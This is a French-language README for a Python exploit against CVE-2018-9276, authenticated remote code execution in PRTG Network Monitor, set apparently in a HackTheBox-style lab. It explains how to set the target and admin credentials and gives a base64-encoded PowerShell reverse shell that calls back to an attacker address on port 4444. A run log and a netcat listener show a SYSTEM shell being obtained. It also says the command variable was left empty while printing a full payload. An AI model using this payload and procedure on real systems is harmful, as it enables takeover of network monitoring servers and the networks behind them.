
Exploit Python pour CVE: 2018-9276
Exécution de code à distance authentifiée sur PRTG Network Monitor Basé sur https://www.exploit-db.com/exploits/46527
Utilisation : modifiez simplement manuellement le script pour inclure votre URL cible, nom d'utilisateur admin et mot de passe comme suit :
TARGET = "http://10.129.15.52"
USER = "prtgadmin"
PASS = "PrTg@dmin2019"
Ensuite, insérez la commande que vous souhaitez exécuter à la ligne 110. Je recommande de placer un reverse shell encodé en base64 depuis revshells.com pour une connexion instantanée de retour vers votre écouteur.
Remarque : j'ai laissé la variable CMD vide dans le script afin que vous puissiez la personnaliser comme vous le souhaitez.
CMD = "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AOQAzACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
Exécutez simplement le script sans aucun paramètre et vous devriez recevoir une connexion de retour sur votre écouteur
┌──(root㉿user)-[/run/…/user/2024/HTBox/jerry]
└─# python3 CVE-2018-9276.py
[*] Tentative de connexion en tant que : prtgadmin
[+] Connexion réussie
[*] Création d'une notification malveillante...
[+] Notification créée. ID: 2019
[*] Déclenchement du test de notification...
[+] Charge utile mise en file d'attente avec succès.
[*] Suppression de la notification 2019...
[+] Nettoyage terminé.
[*] Cycle d'exploit terminé. Vérifiez la cible.
┌──(root㉿user)-[/home/user]
└─# rlwrap nc -lvnp 4444
écoute sur [any] 4444 ...
connexion à [10.10.15.93] depuis (INCONNU) [10.129.15.52] 50466
whoami
nt authority\system
PS C:\Windows\system32>
J'ai remarqué qu'il n'y avait pas de script Python pour cet exploit, j'ai donc pensé qu'il serait bon d'en assembler un.